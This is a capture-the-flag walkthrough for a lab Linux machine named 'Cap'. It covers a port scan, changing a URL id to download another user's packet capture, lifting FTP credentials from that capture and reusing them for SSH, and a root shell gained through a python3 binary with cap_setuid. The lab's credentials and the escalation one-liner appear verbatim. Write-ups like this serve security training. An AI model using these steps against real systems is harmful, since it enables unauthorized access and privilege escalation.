Cap

OS: Linux

Difficulty: Easy

Port Scanning

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack gunicorn

checking out the website

Now we know that this site is used for network monitoring and that there is a user named Nathan.

Checking out "Security Snapshot"

This option redirects us to /data/1 where no traffic is logged. I changed it to /data/0 and here we see that there is some recorded traffic.

I clicked to download and got a file called 0.pcap so I opened it with wireshark.

User

In this file, we can see a lot of important information. We see that the user made http requests to the site. We see some TCP requests. But the main thing is that we see some FTP requests, where we can get Nathan's username and password on the FTP server.

Sorting the requests by protocol and navigating to the end of the file we find this information.

user: nathan

password: Buck3tH4TF0RM3!

We can download the user flag running

get user.txt

We can also use these credentials to log in in ssh.

ssh nathan@<box_ip>

password: Buck3tH4TF0RM3!

Privesc

After some simple enumerations, I saw that the file /var/www/html/app.py had a line written "os.setuid(1000)". That led me to enumerate the binaries with capabilities to change their own uid to 0 (from root)

getcap -r / 2>/dev/null

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

We see that python3 is allowed to change its own uid. We can make a program that changes its uid and run a shell as root.

python3 -c 'import os;os.setuid(0);os.system("bash")'

Helpful links:

Web

User

Privesc